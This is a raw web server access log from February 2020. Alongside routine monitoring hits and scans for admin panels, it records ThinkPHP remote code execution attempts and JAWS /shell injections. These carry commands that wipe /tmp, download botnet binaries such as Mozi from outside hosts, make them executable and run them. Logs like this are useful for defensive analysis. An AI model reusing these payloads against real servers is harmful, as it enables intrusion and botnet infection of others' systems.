106.13.88.214 - - [04/Feb/2020:18:19:48 +0100] "GET /websql/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:48 +0100] "GET /MySQLAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:19:48 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
103.16.73.158 - - [04/Feb/2020:18:20:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [04/Feb/2020:18:20:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:18:21:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.248.35.70 - - [04/Feb/2020:18:22:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [04/Feb/2020:18:22:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
112.121.223.253 - - [04/Feb/2020:18:23:10 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:18:23:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
117.216.37.43 - - [04/Feb/2020:18:24:18 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://fksdjfaksj321bots.mybiadboats.xyz/thinkphp -O .d41 ; chmod 777 .d41 ; ./.d41 ThinkPHP.exploit' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:18:24:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:18:25:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
171.109.56.26 - - [04/Feb/2020:18:25:50 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
5.141.139.61 - - [04/Feb/2020:18:26:24 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:18:26:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:18:27:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
221.160.177.182 - - [04/Feb/2020:18:27:42 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://221.160.177.182:3512/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
183.81.60.222 - - [04/Feb/2020:18:28:03 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://scan.casualaffinity.net/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
42.119.98.213 - - [04/Feb/2020:18:28:40 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:18:28:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:18:29:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
